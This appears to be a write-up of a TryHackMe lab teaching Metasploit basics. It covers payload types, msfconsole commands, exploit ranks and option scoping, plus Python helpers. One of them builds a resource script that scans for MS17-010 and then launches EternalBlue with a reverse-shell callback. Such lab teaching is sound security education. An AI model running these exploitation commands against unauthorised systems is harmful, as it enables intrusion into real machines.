THM: Metasploit: Introduction

Solution to the TryHackMe “Metasploit: Introduction” room.

Introduction to Metasploit

Metasploit is the most widely used exploitation framework. Metasploit is a powerful tool that can support all phases of a penetration testing engagement, from information gathering to post-exploitation.

Metasploit has two main versions:

  • Metasploit Pro: The commercial version that facilitates the automation and management of tasks. This version has a graphical user interface (GUI).
  • Metasploit Framework: The open-source version that works from the command line. This room will focus on this version, installed on the AttackBox and most commonly used penetration testing Linux distributions.

The Metasploit Framework is a set of tools that allow information gathering, scanning, exploitation, exploit development, post-exploitation, and more. While the primary usage of the Metasploit Framework focuses on the penetration testing domain, it is also useful for vulnerability research and exploit development.

The main components of the Metasploit Framework can be summarized as follows:

  • msfconsole: The main command-line interface.
  • Modules: supporting modules such as exploits, scanners, payloads, etc.
  • Tools: Stand-alone tools that will help vulnerability research, vulnerability assessment, or penetration testing. Some of these tools are msfvenom, pattern_create and pattern_offset. We will cover msfvenom within this module, but pattern_create and pattern_offset are tools useful in exploit development which is beyond the scope of this module.


Main Components of Metasploit

Before diving into modules, it would be helpful to clarify a few recurring concepts: vulnerability, exploit, and payload.

  • Exploit: A piece of code that uses a vulnerability present on the target system.
  • Vulnerability: A design, coding, or logic flaw affecting the target system. The exploitation of a vulnerability can result in disclosing confidential information or allowing the attacker to execute code on the target system.
  • Payload: An exploit takes advantage of a vulnerability. However, if we want the exploit to have the result we want (gaining access to the target system, reading confidential information, etc.), we need to use a payload. Payloads are the code that will run on the target system.

Modules and the categories under each one are listed below.

  • Auxiliary: Any supporting module, such as scanners, crawlers and fuzzers, can be found here.
  • Encoders: Encode the exploit and payload in the hope that a signature-based antivirus solution misses them. Encoding only changes the byte pattern, not the behaviour, so do not count on it against current endpoint protection.
  • Evasion: While encoders encode the payload, they should not be considered a direct attempt to evade antivirus software. Evasion modules, on the other hand, try exactly that, with more or less success.
  • Exploits: Neatly organized by target system.
  • NOPs: (No OPeration) do nothing, literally. On the Intel x86 CPU family they are represented by 0x90, following which the CPU does nothing for one cycle. They are often used as padding to achieve consistent payload sizes.
  • Payloads: Code that runs on the target system. There are four directories under payloads: adapters, singles, stagers and stages.
  • Adapters: An adapter wraps a single payload to convert it into a different format. For example, a normal single payload can be wrapped inside a PowerShell adapter, which produces a single PowerShell command that executes the payload.
  • Singles: Self-contained payloads (add a user, launch notepad.exe, etc.) that do not need to download an additional component to run.
  • Stagers: Responsible for setting up a connection channel between Metasploit and the target system. Used with staged payloads: a staged payload first sends a small stager to the target, which then downloads the rest of the payload (the stage). The advantage is that the initial payload is much smaller than the full payload sent at once.
  • Stages: Downloaded by the stager. This lets you use larger payloads.
  • Post: Post modules are used in the final stage of the penetration testing process listed above, post-exploitation.

Metasploit has a subtle way to help you tell single (also called “inline” or stageless) payloads from staged payloads. Compare:

  • generic/shell_reverse_tcp
  • windows/x64/shell/reverse_tcp

Both are reverse TCP command shells. The former is an inline (single) payload, as indicated by the “_” between “shell” and “reverse”. The latter is a staged payload, as indicated by the “/” between “shell” and “reverse”.
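The separator rule above is easy to apply by hand to one payload, but it also generalizes to the whole payloads tree. The script below is an added example, not code from the TryHackMe room or from Metasploit: it parses a payload path into platform, stage and stager and labels it single or staged. STAGE_NAMES and the sample paths in __main__ are assumptions made for this example; the real framework knows its stages from module metadata.

```python
"""Tell inline (single) Metasploit payloads from staged ones by their path.

Added example; not code from the TryHackMe room or from Metasploit. Rule:
"<stage>_<stager>" in one path component (underscore) is a single payload,
"<stage>/<stager>" in two components (slash) is staged: the stager downloads
the stage. STAGE_NAMES is an assumed list for this example.
"""
from dataclasses import dataclass
from typing import List

# Stage directories as seen under payloads/stages/; assumed list for this example.
STAGE_NAMES = {"shell", "meterpreter", "powershell", "vncinject", "dllinject", "custom"}
# Connection types that appear as stagers or as the tail of a single payload's name.
CONNECTION_TYPES = ("reverse", "bind")


@dataclass(frozen=True)
class Payload:
    path: str
    kind: str       # "single" or "staged"
    platform: str   # e.g. "windows/x64", "generic", "cmd/unix"
    stage: str      # what eventually runs: "shell", "meterpreter", "pingback", ...
    stager: str     # how it connects: "reverse_tcp", "bind_tcp", "" if none


def classify_payload(path: str) -> Payload:
    parts = path.strip("/").split("/")
    if len(parts) < 2:
        raise ValueError(f"not a payload path: {path!r}")

    # Staged: the stage is its own component, e.g. windows/x64/shell/reverse_tcp
    if len(parts) >= 3 and parts[-2] in STAGE_NAMES:
        return Payload(path, "staged", "/".join(parts[:-2]), parts[-2], parts[-1])

    platform, name = "/".join(parts[:-1]), parts[-1]

    # Single with a connection: <stage>_<reverse|bind>_<transport>, e.g. shell_reverse_tcp
    for conn in CONNECTION_TYPES:
        idx = name.find(f"_{conn}_")
        if idx > 0:
            return Payload(path, "single", platform, name[:idx], name[idx + 1:])

    # Single that is only a connection, e.g. cmd/unix/reverse_bash: the "stage"
    # is the interpreter named by the last platform component.
    if name.startswith(tuple(f"{c}_" for c in CONNECTION_TYPES)):
        return Payload(path, "single", platform, parts[-2], name)

    # Single with no network component at all, e.g. windows/exec or windows/adduser
    return Payload(path, "single", platform, name, "")


def summarize(paths: List[str]) -> List[str]:
    """One line per payload: kind, platform, stage, stager, path."""
    rows = []
    for p in paths:
        pl = classify_payload(p)
        rows.append(f"{pl.kind:7} {pl.platform:13} stage={pl.stage:12} "
                    f"stager={pl.stager or '-'}  {pl.path}")
    return rows


if __name__ == "__main__":
    # The two paths from the text plus a few more from the payloads tree (sample input).
    samples = [
        "generic/shell_reverse_tcp",
        "windows/x64/shell/reverse_tcp",
        "windows/x64/pingback_reverse_tcp",
        "windows/x64/meterpreter/reverse_https",
        "linux/x64/meterpreter_reverse_tcp",
        "cmd/unix/reverse_bash",
        "windows/exec",
    ]
    print("\n".join(summarize(samples)))
```

Run it and the pingback payload from the question below comes out as single, while windows/x64/meterpreter/reverse_https comes out as staged with stager reverse_https. Note that a stageless meterpreter (meterpreter_reverse_tcp) is a single by this rule, which matches how the framework files it.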

Answer the questions

What is the name of the code taking advantage of a flaw on the target system?

Answer: Exploit

What is the name of the code that runs on the target system to achieve the attacker's goal?

Answer: Payload

What are self-contained payloads called?

Answer: Singles

Is "windows/x64/pingback_reverse_tcp" a single or a staged payload?

Answer: Singles


Msfconsole

The console will be your main interface to the Metasploit Framework. You can launch it using the msfconsole command.

The Metasploit console (msfconsole) can be used much like a regular command-line shell: common system commands work from inside it. It does not support output redirection, however, so something like `help > help.txt` will not write a file.

  • ls: lists the contents of the folder from which msfconsole was launched.
  • ping: works as it does from a normal shell.
  • clear: clears the terminal screen.
  • help [command]: shows general help, or the help for one command.
  • history: shows the commands typed in this session.

msfconsole supports tab completion, so you can auto-complete commands, module paths and option names.

  • use: changes to the module you have decided to use.
  • show options: prints the options of the module you have chosen.
  • set: sets an option (locally) for the chosen module; if you change module, the value is reset.
  • show payloads: lists the payloads compatible with the chosen exploit.
  • back: leaves the current module context.
  • info: gives more information about a module, either after choosing it or by passing the module path (e.g. info auxiliary/scanner/ssh/ssh_login) without entering it.
  • search: searches the Metasploit Framework database for modules relevant to the given search parameter. You can search using CVE numbers, exploit names (eternalblue, heartbleed, etc.), or target system.
```shell
msf6 > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index, for example use 4 or use exploit/windows/smb/smb_doublepulsar_rce

msf6 >
```

The output of the search command provides an overview of each returned module. You may notice the “name” column already gives more information than just the module name.

You can see the type of module (auxiliary, exploit, etc.) and the category of the module (scanner, admin, windows, Unix, etc.).

You can use any module returned in a search result with the command use followed by the number at the beginning of the result line. (e.g. use 0 instead of use auxiliary/admin/smb/ms17_010_command)

Another essential piece of information returned is in the “rank” column. Exploits are rated based on their reliability. The list below gives the meaning of each rank.

  • Excellent: The exploit will never crash the service. This is the case for SQL injection, command execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances (WMF Escape()).
  • Great: The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check.
  • Good: The exploit has a default target and it is the “common case” for this type of software (English, Windows 7 for a desktop app, Windows Server 2012 for a server, etc.). The exploit does not auto-detect the target.
  • Normal: The exploit is otherwise reliable, but depends on a specific version that is not the “common case” for this type of software and can’t (or doesn’t) reliably autodetect.
  • Average: The exploit is generally unreliable or difficult to exploit, but has a success rate of 50% or more for common platforms.
  • Low: The exploit is nearly impossible to exploit (under 50% success rate) for common platforms.
  • Manual: The exploit is unstable or difficult to exploit and is basically a DoS (15% success rate or lower). This ranking is also used when the module has no use unless specifically configured by the user (e.g. exploit/unix/webapp/php_eval).

https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html
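When a search returns dozens of modules, it helps to sort them by that rank and by whether they implement check. The script below is an added example, not code from the TryHackMe room or from Metasploit: it parses the table printed by the search command and filters it using the rank order from the page linked above. The embedded SAMPLE_OUTPUT is the ms17-010 result shown above, so the script runs offline; for live output, capture `msfconsole -q -x "search ms17-010; exit"` and pass its stdout to parse_search().

```python
"""Parse msfconsole `search` output and filter modules by reliability rank.

Added example; not code from the TryHackMe room or from Metasploit. The parser
keys on the rank keyword and the Yes/No check column rather than on column
positions, because msfconsole pads each column to fit its longest entry.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Reliability ranks from the Metasploit exploit-ranking page, lowest to highest.
RANK_ORDER = ["manual", "low", "average", "normal", "good", "great", "excellent"]

# The ms17-010 search result shown in the text, embedded as sample input.
SAMPLE_OUTPUT = """\
Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
"""

ROW_RE = re.compile(
    r"^\s*(?P<idx>\d+)\s+"                 # result index, usable as `use <n>`
    r"(?P<name>\S+)\s+"                    # type/category/.../module
    r"(?P<date>\d{4}-\d{2}-\d{2})?\s*"     # disclosure date, may be blank
    r"(?P<rank>" + "|".join(RANK_ORDER) + r")\s+"
    r"(?P<check>Yes|No)\s+"                # does the module implement `check`?
    r"(?P<desc>.*?)\s*$"
)


@dataclass(frozen=True)
class Module:
    index: int
    name: str
    disclosure: Optional[str]
    rank: str
    check: bool
    description: str

    @property
    def type(self) -> str:       # auxiliary, exploit, post, ...
        return self.name.split("/")[0]

    @property
    def category(self) -> str:   # scanner, admin, windows, ...
        return self.name.split("/")[1]


def parse_search(text: str) -> List[Module]:
    modules = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:                # banner, header and separator lines
            continue
        modules.append(Module(int(m["idx"]), m["name"], m["date"], m["rank"],
                              m["check"] == "Yes", m["desc"]))
    return modules


def filter_modules(modules: List[Module], min_rank: str = "normal",
                   module_type: Optional[str] = None,
                   require_check: bool = False) -> List[Module]:
    """Keep modules at or above min_rank, most reliable first."""
    floor = RANK_ORDER.index(min_rank)
    keep = [m for m in modules
            if RANK_ORDER.index(m.rank) >= floor
            and (module_type is None or m.type == module_type)
            and (m.check or not require_check)]
    return sorted(keep, key=lambda m: (-RANK_ORDER.index(m.rank), m.index))


if __name__ == "__main__":
    for m in filter_modules(parse_search(SAMPLE_OUTPUT), module_type="exploit"):
        print(f"use {m.index}  # {m.rank:8} check={m.check}  {m.name}")
```

With the defaults, ms17_010_eternalblue drops out of the exploit list because its rank is average, which is exactly the kind of module you want to run check against before exploit. The regex deliberately tolerates the blank disclosure date on the scanner row.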

You can direct the search function using keywords such as type and platform. For example, to list only auxiliary modules related to telnet:

```bash
msf6 > search type:auxiliary telnet
```

Answer the questions

How would you search for a module related to Apache?

Answer: search apache

Who provided the auxiliary/scanner/ssh/ssh_login module?
```bash
msf > info auxiliary/scanner/ssh/ssh_login
```

Answer: todb


Working with modules

Once you have entered the context of a module using the use command followed by the module name, as seen earlier, you will need to set parameters. The most common parameters you will use are listed below. Remember, based on the module you use, additional or different parameters may need to be set. It is good practice to use the show options command to list the required parameters.

All parameters are set using the same command syntax:

set PARAMETER_NAME VALUE

As mentioned earlier, the show options command will list all available parameters.

```bash
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
```

We will set the RHOSTS parameter to the IP address of our target system using the set command:

```bash
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.165.39
```

Once you have set a parameter, you can use the show options command to check the value was set correctly.

Other parameters you will frequently need to set:

  • RHOSTS: “Remote host(s)”, the target. A single IP, a range, a CIDR block or a hosts file given with the file: syntax are accepted.
  • RPORT: “Remote port”, the port on the target system the vulnerable application is running on.
  • PAYLOAD: The payload you will use with the exploit.
  • LHOST: “Local host”, the IP address of the attacking machine (your AttackBox or Kali Linux). It must be reachable from the target, since the reverse shell connects back to it.
  • LPORT: “Local port”, the port the reverse shell will connect back to. This is a port on your attacking machine, and you can set it to any port not used by another application.
  • SESSION: Each connection established to the target system using Metasploit has a session ID. You will use this with post-exploitation modules that connect to the target system through an existing session.
You can override any set parameter using the set command again with a different value. You can also clear any parameter value using the `unset` command or clear all set parameters with the `unset all` command.

You can use the setg command to set values that will be used for all modules. The setg command is used like the set command. The difference is that if you use the set command to set a value using a module and you switch to another module, you will need to set the value again. The setg command allows you to set the value so it can be used by default across different modules. You can clear any value set with setg using unsetg.

The example below uses the following flow:

  1. We use the ms17_010_eternalblue exploit.
  2. We set the RHOSTS variable using the setg command instead of the set command.
  3. We use the back command to leave the exploit context.
  4. We use an auxiliary module (this module is a scanner that detects MS17-010).
  5. The show options command shows the RHOSTS parameter is already populated with the IP address of the target system.
```bash
msf6 > use exploit/windows/smb/ms17_010_eternalblue 
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > setg rhosts 10.10.165.39
rhosts => 10.10.165.39
msf6 exploit(windows/smb/ms17_010_eternalblue) > back
msf6 > use auxiliary/scanner/smb/smb_ms17_010 
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                Required  Description
   ----         ---------------                                                --------  -----------
   CHECK_ARCH   true                                                           no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                           no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                          no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /opt/metasploit-framework-5101/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS       10.10.165.39                                                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT        445                                                            yes       The SMB service port (TCP)
   SMBDomain    .                                                              no        The Windows domain to use for authentication
   SMBPass                                                                     no        The password for the specified username
   SMBUser                                                                     no        The username to authenticate as
   THREADS      1                                                              yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/smb/smb_ms17_010) >
```
The `setg` command sets a global value that will be used until you exit Metasploit or clear it using the `unsetg` command.

Once all module parameters are set, you can launch the module using the exploit command. Metasploit also supports the run command, which is an alias created for the exploit command as the word exploit did not make sense when using modules that were not exploits (port scanners, vulnerability scanners, etc.).

  • The exploit command can be used without any parameters or with the “-z” parameter.
  • exploit -z runs the exploit and backgrounds the session as soon as it opens.
  • Some modules support the check command. It tests whether the target is vulnerable without exploiting it, which is the sensible first step for a module whose rank warns of instability (in the search output above, ms17_010_eternalblue is ranked average and does support check).

Once a vulnerability has been successfully exploited, a session will be created. This is the communication channel established between the target system and Metasploit.

You can use the background command to background the session prompt and go back to the msfconsole prompt.

Alternatively, CTRL+Z can be used to background sessions.

Session

The sessions command can be used from the msfconsole prompt or any context to see the existing sessions.

To interact with any session, you can use the sessions -i command followed by the desired session number.
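The whole flow above (setg a shared RHOSTS, scan, switch modules, set exploit-local options, check, exploit -z, list sessions) is what you would normally put in a resource script so it can be replayed with `msfconsole -q -r <file>`. The code below is an added example, not code from the TryHackMe room or from Metasploit: the Console class is a small stand-in for msfconsole's two datastores as the text describes them (set values belong to the current module and are gone after you use another module; setg values are global and act as a fallback until unsetg), and it records every command so the same sequence can be written out as a .rc file. The target IP is the one used in the text; the LHOST in __main__ is an assumed attacker address.

```python
"""Model set/setg scoping and turn the workflow above into a resource script.

Added example; not code from the TryHackMe room or from Metasploit. Console
models the scoping described in the text: `set` is module-local and dropped
on `use`, `setg` is global and consulted as a fallback until `unsetg`.
"""
from pathlib import Path
from typing import Dict, List, Optional


class Console:
    def __init__(self) -> None:
        self.globals: Dict[str, str] = {}    # setg / unsetg
        self.locals: Dict[str, str] = {}     # set / unset, per module context
        self.module: Optional[str] = None
        self.commands: List[str] = []        # what will go into the .rc

    def use(self, module: str) -> None:
        # A new module context starts with an empty local datastore, which is
        # why plain `set` values have to be set again after switching modules.
        self.module, self.locals = module, {}
        self.commands.append(f"use {module}")

    def back(self) -> None:
        self.module, self.locals = None, {}
        self.commands.append("back")

    def set(self, name: str, value: str) -> None:
        if self.module is None:
            raise RuntimeError("set needs a module context; use setg outside one")
        self.locals[name.upper()] = value
        self.commands.append(f"set {name.upper()} {value}")

    def setg(self, name: str, value: str) -> None:
        self.globals[name.upper()] = value
        self.commands.append(f"setg {name.upper()} {value}")

    def unset(self, name: str) -> None:
        self.locals.pop(name.upper(), None)
        self.commands.append(f"unset {name.upper()}")

    def unsetg(self, name: str) -> None:
        self.globals.pop(name.upper(), None)
        self.commands.append(f"unsetg {name.upper()}")

    def get(self, name: str) -> Optional[str]:
        # What `show options` would display: the module value, else the global.
        return self.locals.get(name.upper(), self.globals.get(name.upper()))

    def cmd(self, command: str) -> None:
        # run / exploit / check / sessions are recorded verbatim.
        self.commands.append(command)

    def to_rc(self) -> str:
        return "\n".join(self.commands) + "\n"


def build_ms17_010_rc(rhosts: str, lhost: str, lport: int = 4444) -> Console:
    """Scan, check, then exploit, following the flow in the text above."""
    c = Console()
    c.setg("RHOSTS", rhosts)                            # shared by scanner and exploit
    c.use("auxiliary/scanner/smb/smb_ms17_010")
    c.cmd("run")                                        # run is an alias of exploit
    c.use("exploit/windows/smb/ms17_010_eternalblue")
    c.set("LHOST", lhost)                               # local to the exploit module
    c.set("LPORT", str(lport))
    c.cmd("check")                                      # vulnerable? without exploiting
    c.cmd("exploit -z")                                 # background the session on open
    c.cmd("sessions -l")
    return c


def write_rc(console: Console, path: str) -> str:
    Path(path).write_text(console.to_rc())
    return path


if __name__ == "__main__":
    console = build_ms17_010_rc("10.10.165.39", "10.10.14.5")  # LHOST: assumed attacker IP
    print(console.to_rc(), end="")
    print("# written:", write_rc(console, "ms17_010.rc"), "-> msfconsole -q -r ms17_010.rc")
```

After build_ms17_010_rc, get("RHOSTS") still resolves inside the exploit context through the global fallback, while get("LHOST") returns None as soon as you back out and use the scanner again. The scoping modelled here is the behaviour described in the text; confirm it on your installed msfconsole with show options after switching modules before relying on it in a real engagement.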

Answer the questions

How would you set the LPORT value to 6666?

Answer: set LPORT 6666

How would you set the global value for RHOSTS  to 10.10.19.23 ?

Answer: setg RHOSTS 10.10.19.23

What command would you use to clear a set payload?

Answer: unset PAYLOAD

What command do you use to proceed with the exploitation phase?

Answer: exploit